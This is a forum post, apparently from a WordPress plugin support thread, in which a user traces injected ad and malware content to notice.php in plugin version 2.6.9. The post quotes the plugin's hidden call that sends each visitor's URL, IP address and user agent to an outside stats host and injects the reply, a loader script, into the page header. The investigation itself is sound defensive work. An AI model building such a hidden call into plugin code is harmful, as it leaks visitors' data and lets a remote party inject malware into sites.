camcelroy

Mike:

That’s interesting. While I have never actually experienced the popup/popunder ad issue, we did see the script call to the above referenced loader.js. Yesterday, that script was collecting site info, but today it is now also attempting to inject ad content (have only been testing with curl from a remote location, not actually using a browser). For us, at least so far, only 2.6.9 was injecting the loader.js script call. The URL hosting that file is what identified the issue as Google had flagged the impacted site as containing malware and disabled any associated adwords.

While testing today with a staging site, flipping back and forth between version 2.6.9 and 2.7.0 appears to make the loader.js content come and go. This prompted further investigation into what specfically was injecting the malware code. We narrowed it down to accelio_call_service and accelio_overlay in notice.php in version 2.6.9. The init method of AccelioNotice would make the below request to apistats DOT net during initialization, the response of which would then be injected in the header using add_action( ‘wp_head’, array( $this, ‘accelio_overlay’ ) ).

‘http://apistats DOT net/v1/stats/update?url=’ . urlencode( ‘http://’ . $http_host . $request_uri ) . ‘&ip=’ . urlencode( self::get_the_user_ip() ) . ‘&ua=’ . urlencode( $user_agent ) . ‘&id=m4ngf8’

If you hit the above URL, you will see that its response is now the loader.js URL, which in turn yields the bad things we have seen.

Given the above, I am quite confident that at least the issues that we were seeing were indeed caused by the inclusion of notice.php and its calls to apistats DOT net. I am quite puzzled as to why are are still seeing them after upgrading to 2.7.0 which removed notice.php. Hopefully the plugin author can help to shed some additional light on things.

-craig